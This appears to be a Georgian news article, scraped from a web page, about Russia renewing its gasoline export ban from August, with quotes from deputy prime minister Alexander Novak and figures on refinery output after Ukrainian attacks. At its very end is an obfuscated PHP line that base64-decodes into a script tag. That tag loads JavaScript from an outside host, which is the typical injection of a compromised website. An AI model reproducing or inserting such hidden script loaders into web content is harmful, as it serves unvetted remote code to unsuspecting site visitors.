celsiusi
ავერსი საქკაბელი

რუსეთის მთავრობა ბენზინის ექსპორტის აკრძალვას აგვისტოდან გააახლებს. ამის შესახებ რუსეთის ვიცე-პრემიერმა განაცხადა.

მისივე თქმით, ენერგეტიკის სამინისტრომ ითხოვა, აკრძალვის სექტემბერ-ოქტომბრამდე გაგრძელება.

ცნობისთვის, ბენზინის ექსპორტის აკრძალვა რუსეთმა 2024 წლის 1-ელი მარტიდან დააწესა. 20 მაისიდან 31 ივლისის ჩათვლით გამონაკლისი მოქმედებს.

"1-ელი აგვისტოდან გამონაკლისის პერიოდი იწურება. ნავთობპროდუქტების ექსპორტის ავტომატური აკრძალვა მხოლოდ ბენზინს ეხება", - განაცხადა ალექსანდრ ნოვაკმა მედიასთან.

როგორც რუსეთის ვიცე-პრემიერმა აღნიშნა, აკრძალვა სექტემბერ-ოქტომბრამდე იმოქმედებს.

"პირველ რიგში, მიწოდების - მოთხოვნის ბალანსიდან და შიდა ბაზრის უზრუნველსაყოფად ვმოქმედებთ. თუ დავინახავთ, რომ სექტემბერ-ოქტომბრის შემდეგ, ექსპორტის ბენზინის აკრძალვა საჭირო გახდება, ამ გადაწყვეტილებას მივიღებთ", - აღნიშნა მან.

მედიის ინფორმაციით, რუსეთის გადამმუშავებელ ქარხნებზე უკრაინის თავდასხმების შემდეგ, ივნისში ნავთობის გადამუშავების მოცულობა 2 წლის დაბალ ნიშნულამდე დაეცა. ბენზინის გამომუშავება დეკემბრის ბოლოდან მაისის ბოლომდე 20%-ით, ხოლო დიზელის საწვავის - 11%-ით შემცირდა.

129
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");